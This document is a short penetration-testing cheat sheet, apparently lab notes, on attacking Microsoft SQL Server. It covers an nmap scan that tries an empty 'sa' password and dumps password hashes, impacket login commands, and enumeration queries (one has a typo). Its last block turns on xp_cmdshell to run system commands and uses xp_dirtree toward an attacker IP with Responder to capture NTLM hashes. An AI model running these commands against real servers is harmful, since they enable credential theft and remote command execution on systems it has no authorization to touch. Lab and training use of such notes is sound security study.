# Footprinting
Nmap MSSQL Script Scan
```bash
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
```
Connecting with Mssqlclient.py
```bash
python3 mssqlclient.py
[email protected] -windows-auth
impacket-mssqlclient <domain>/<username>:<password>@<domain>
```
# Commands
```sql
select * from sys.databses;
- select name from sys.databases;
- select name from master..sysdatabases;
use <DB>;
select * from sys.tables;
- select name from sys.tables;
select * from <table>;
SELECT COLUMN_NAME, DATA_TYPE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = <TABLE>;
```
```sql
xp_cmdshell whoami
enable_xp_cmdshell
xp_dirtree \\<attacker-IP>\fake\share + sudo responder -I tun0
```